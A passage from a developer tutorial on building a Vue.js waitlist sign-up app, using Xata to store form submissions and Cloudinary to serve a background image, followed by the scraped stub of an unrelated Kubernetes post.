```javascript
npm install -g @xata.io/cli@latest
```
### Installing Xata in our project
To use Xata in our project, we will install the Xata software development kit (SDK) from the command line like so:
```javascript
npx xata
```
After this, we can then initialize Xata for use in our application by running the command below:
```javascript
xata init
```
Xata will present us varieties of options from which we can choose. In the end, Xata will generate some files for usage, among which we will have the `.xatrc` and `.env` files.
We will need to edit the name of the Xata API key in our Vue app to the one below to allow the Vue application to pick up the environment variable.
```javascript
VUE_APP_XATA_API_KEY="add your api key"
```
## Cloudinary Setup
For our application's asset management, if you haven't already, you need to create an account with Cloudinary by clicking [**here**](https://cloudinary.com?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog). Creating an account is entirely free.
We will need to install the [Cloudinary Vue.js SDK](https://cloudinary.com/documentation/vue_integration?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog) with the command below before configuring it in your Vue app.
```javascript
npm install cloudinary-vue
```
We will need to configure the installed SDK in our Vue app by navigating to the `main.js` and adding the following to the file.
```javascript
import Cloudinary from "cloudinary-vue";
Vue.use(Cloudinary, {
configuration: {
cloudName: "XXX," //add the cloudinary cloudname here,
secure: true }
});
```
Our waitlist will have an image, which we will upload to Cloudinary. In this case, we used this image by [Hannah Busing](https://unsplash.com/photos/4J16oO4MmXs?utm_source=unsplash&utm_medium=referral&utm_content=creditShareLink).
## Adding the landing page image
We want our waitlist application to have the image we uploaded to Cloudinary. To do this, we will create a file named `components/TheCloudinaryBackground.vue` and add the code below:
```javascript
<template>
<cld-image publicId="hannah-busing-unsplash" dpr="auto" class="dn db-l w-50-ns vh-100" quality= "auto">
<cld-transformation flags="rasterize" />
</cld-image>
</template>
<script>
export default {
name: "TheCloudinaryBackground",
}
</script>
```
From the above, we achieved the following:
- Cloudinary provides us with several templates to use in our Vue app. One of which is the `<cld-image />` and the `<cld-transformation />` components we will use to generate our invoice
- Passed in the `publicId` of the Cloudinary file we will be using, which is named `hannah-busing-unsplash`
- Cloudinary components support asset transformations, which we leveraged by adding attributes like the `dpr` attribute, which we set to a value of `auto`. The `dpr` attribute ensures that users receive images at their devices' pixel ratio(dpr) and size.
To render this template, we will need to import it into the `views/HomeView.vue` file like so:
```javascript
<template>
<div class="flex-l flex-row-l justify-center justify-between-l">
<TheCloudinaryBackground />
</div>
</template>
<script>
import TheCloudinaryBackground from "@/components/TheCloudinaryBackground.vue";
export default {
components: {
TheCloudinaryBackground,
}
}
</script>
```
## Creating the waitlisting form
The waitlisting application is incomplete without the form where interested candidates can register.
To create this form, we will create a `components/TheWaitlistForm.vue` file and add the code below.
```javascript
<template>
<div class="bg-waitlist vh-100 w-50-ns w-100-m">
<div class="w-70 center pv6">
<h3 class="f2 f1-m f-headline-l measure-narrow lh-title mv0">
<span class="lh-copy brown pa1 tracked-tight">
Joinr.
</span>
</h3>
<h4 class="f5 fw1 lh-copy georgia i mt0">
Be one of the first to access our service!
</h4>
<p></p>
<form @submit.prevent="submitForm">
<label for="firstname" class="db mb2 brown b georgia">First Name</label>
<input type="text" class="db w-80 w-60-m pa2 br2 mb3 ba bw1 b--brown" name="firstname" id="firstname" v-model="firstname" placeholder="First name">
<label for="lastname" class="db mb2 brown b georgia">Last Name</label>
<input type="text" class="db w-80 w-60-m pa2 br2 mb3 ba bw1 b--brown" name="lastname" id="lastname" v-model="lastname" placeholder="Last name">
<label for="email" class="db mb2 brown b georgia">Email</label>
<input type="email" class="db w-80 w-60-m pa2 br2 mb4 ba bw1 b--brown" name="email" id="email" v-model="email" placeholder="Email">
<div class="w-100">
<button type="submit" class="f6 ttu tracked black-80 bg-brown pa3 br3 white bb link b--brown hover-white dim bg-animate pointer">Join waitlist</button>
</div>
</form>
</div>
</div>
</template>
<script>
export default {
data: () => ({
firstname: "",
lastname: "",
email: ""
})
}
</script>
```
From the code block above, we achieved the following:
- Created a functional form to handle interested candidates' input for the waitlist
- Added the `data` in the Vue script to manage the names and email of the people who will fill out the form
To render this template, we will need to import it into the `views/HomeView.vue` file. Together with the imported Cloudinary background, our `views/HomeView.vue` file should be like the below:
```javascript
<template>
<div class="flex-l flex-row-l justify-center justify-between-l">
<TheCloudinaryBackground />
<TheWaitlistForm />
</div>
</template>
<script>
import TheCloudinaryBackground from "@/components/TheCloudinaryBackground.vue";
import TheWaitlistForm from "@/components/TheWaitlistForm.vue";
export default {
components: {
TheCloudinaryBackground,
TheWaitlistForm
}
}
</script>
```
At this stage, our page should look like the below:

## Creating the success page
We want to ensure that on successfully adding the user's details to the waitlist, the user gets directed to a confirmation page. For this, we will create a file called `views/SuccessView.vue` and add the code below:
```javascript
<template>
<div class="bg-waitlist vh-100">
<div class="w-60-l w-80-m w-100 center tc pv6 ph3">
<h3 class="f1 measure-narrow lh-title mv0">
<span class="lh-copy brown pa1 tracked-tight">
You are now on the waitlist
</span>
</h3>
<h4 class="f5 fw1 lh-copy georgia i mt0">
We will reach out to you soon with juicy updates!
</h4>
<a href="/" class="db link f6 ttu tracked black-80 bg-brown pv3 br3 white bb link b--brown hover-white dim bg-animate pointer mt5 w-70 w-30-ns center">
Go To Home
</a>
</div>
</div>
</template>
```
From the code block above, we were able to achieve the following:
- Created a success page which the user gets directed to
- Added a button that takes the user back to the home page
Our waitlist confirmation page should look like the following:

## Submitting waitlist
We must submit the form data from interested people into the **"Signups"** table in our previously created Xata database. To do this, we will add the code below to the script tag of the `components/TheWaitlistForm.vue` file.
```javascript
<script>
import { getXataClient } from '@/xata'
export default {
data: () => ({
// data goes here
}),
methods: {
async submitForm() {
const xata = getXataClient()
await xata.db.signups.create({
firstname: this.firstname,
lastname: this.lastname,
email: this.email
}).then(() => {
this.$router.push({path:`/success`})
})
}
}
}
</script>
```
From the code block above, we achieved the following:
- Imported the Xata client
- Created a new record for the user on the Xata database
- At successful record creation, the user's view gets changed to the waitlist confirmation page
At this point, our waitlist application should look like the below:

## Conclusion
This article discusses how to build a waitlisting application using Cloudinary and Xata. Cloudinary was used for asset management and image transformation, while we used Xata for storing user details.
## Resources
- [Xata.io documentation](https://xata.io/docs/overview?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog)
- [Cloudinary transformation reference](https://cloudinary.com/documentation/transformation_reference?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog)
| moerayo |
1,270,923 | Kubernetes Concepts: Deep Dive | A post by Idan Refaeli | 0 | 2022-11-24T16:33:30 | https://dev.to/idanref/kubernetes-concepts-deep-dive-50en | kubernetes, docker, devops, cloud | {% embed https://gist.github.com/Idanref/ae90166b055f651bb72ef1bd8cd52b97 %} | idanref |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.